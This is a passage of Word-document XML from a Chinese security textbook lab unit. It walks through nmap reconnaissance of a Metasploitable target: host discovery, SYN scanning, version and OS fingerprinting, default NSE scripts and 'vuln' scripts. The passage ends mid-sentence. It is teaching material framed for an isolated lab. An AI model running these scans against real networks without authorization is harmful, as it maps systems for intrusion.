        <w:t xml:space="preserve">靶机实操单元（本书生命线）:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">① </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">目标与搭建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目标：Metasploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3），具体搭建步骤回指第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章。确保攻击机（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux）与靶机在同一隔离网络（虚拟机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网段），且攻击机已获得对目标进行安全测试的明确授权（自行搭建即视为授权，仅限实验室）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">② </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">逐步命令</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在攻击机终端中以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限执行（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或直接</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">root），以下命令中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;LAB_SUBNET&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TARGET_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">须替换为实际环境值②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1：主机发现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-sn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">LAB_SUBNET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此命令发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP Echo Request、TCP SYN to 443、TCP ACK to 80 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP Timestamp Request </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行存活探测，列出在线主机及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址（若同网段）。将在结果中找到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP，将其记为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TARGET_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2：SYN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">半开扫描</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-sS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">输出将列出常见的开放</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 21/tcp、22/tcp、23/tcp、25/tcp、80/tcp、139/tcp、445/tcp、3306/tcp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等（实际端口因</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版本及服务配置而异②）。每个端口旁标注服务名，源自</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap-services</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的端口-服务默认映射。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3：服务版本扫描（-sV）与操作系统指纹（-O）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-sS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-sV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此命令将：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描发现开放端口；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对开放端口执行服务版本检测，输出具体服务名和版本字符串（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vsftpd 2.3.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenSSH 4.7p1 Debian 8ubuntu1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache httpd 2.2.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等，均为示例，实际视靶机镜像而定②）；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行操作系统识别，最后输出诸如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OS details: Linux 2.6.9 - 2.6.33</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">之类的推断（②）。如果结果精确度不高，可尝试增加</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--osscan-guess</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">选项以猜测较模糊的匹配。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4：使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> NSE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">默认脚本集</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-sS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-sV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-sC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-sC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等价于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--script=default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，会运行一组预选的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NSE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚本，用于收集额外信息，例如：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http-title</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：显示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">主页标题；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh-hostkey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：显示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">主机密钥指纹；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp-anon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：检测</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> FTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">匿名登录是否启用。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这些结果将进一步丰富攻击面信息（输出内容取决于靶机实际配置②）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5：针对性漏洞检测脚本</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-sS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-sV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> vuln </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此命令会执行类别</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vuln</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">下的所有脚本，尝试检测目标上存在的已知漏洞（例如检测</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vsftpd 2.3.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后门、Samba</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">usermap_script</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞等）。输出会显示发现的漏洞名称与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编号，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">注意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：这里提到的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编号为示例，实际扫描结果取决于靶机软件版本与脚本更新，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">绝不编造具体输出</w:t>
      </w:r>
      <w:r>
